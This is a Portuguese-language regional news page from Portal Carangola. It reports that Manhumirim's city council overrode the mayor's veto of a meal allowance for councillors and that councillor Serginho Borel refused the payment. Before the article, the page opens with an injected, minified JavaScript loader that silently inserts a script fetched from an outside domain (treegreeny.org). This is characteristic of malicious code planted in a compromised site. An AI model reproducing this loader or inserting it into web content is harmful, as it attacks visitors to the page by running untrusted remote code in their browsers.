;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhumirim: Vereador Serginho Borel rejeita auxílio-alimentação aprovado por Câmara. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhumirim: Vereador Serginho Borel rejeita auxílio-alimentação aprovado por Câmara.

Serginho_BorelPor maioria de votos dos vereadores (seis), a Câmara Municipal de Manhumirim derrubou o Veto da Prefeita Darci Braga e aprovou o Projeto de Lei (nº 029/2014) que institui o Auxílio-alimentação de cerca de R$ 400,00 para cada vereador, além de servidores da Casa Legislativa. A votação do Veto aconteceu na sessão extraordinária do último dia 23 de Fevereiro.
Três vereadores votaram pela acolhida do Veto, ou seja, contrários à aprovação do Auxílio-alimentação: Sérgio Borel Corrêa (Serginho Borel), Ivan Caetano e Rodrigo Soares. Na mesa data da reunião, o Vereador Serginho Borel encaminhou ofício à Mesa Diretora da Câmara informando que não irá receber o Auxílio-alimentação, justificando que “o pedido se faz legítimo, uma vez que entendo desnecessário o pagamento do mesmo aos nobres edis”.
O auxílio de custo proposto pelos vereadores tem gerado polêmica na cidade, com a insatisfação e indignação manifestadas por cidadãos e internautas, principalmente nas redes sociais e nas ruas, desde o final do ano, quando ele foi aprovado pela primeira vez, pelos vereadores, em 22 de Dezembro de 2014.
Logo no começo do ano, em 09 de Janeiro, a Prefeita Darci Braga vetou o referido Projeto de Lei, devido ao entendimento da sua inconstitucionalidade, por parte do STF (Supremo Tribunal Federal). O próprio Regimento Interno da Câmara M. de Manhumirim faz menção à impossibilidade deste tipo de pagamento, em seu Artigo 62 que cita: “a remuneração do Vereador será fixada pela Câmara, em cada Legislatura, para ter vigência subsequente, sempre até o mês de Junho de cada ano eleitoral, por voto da maioria de seus membros, vedada a concessão de ajuda custo ou outra gratificação extra, a qualquer título”.
Na sessão legislativa de 23 de Fevereiro, o Veto da Prefeita Darci Braga foi colocado em apreciação no plenário. Por seis votos a três, ele foi derrubado. Os vereadores que votaram pela manutenção do Auxílio-alimentação e derrubada do veto, foram Dalbino Cler, Dário Veiga, Benísio Dias Arbuini (Benísio Enfermeiro), João Batista Vieira (João da Casa Franco), Ana Paula Destro e Hélio Mendonça (Helinho Mendonça). O Vereador Sebastião Tristão justificou ausência por motivo de viagem e o Vereador Roberto Belarmino (Bob) não vota, por ser o Presidente da Câmara.
(Ass. de Comunicação – Prefeitura de Manhumirim)

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.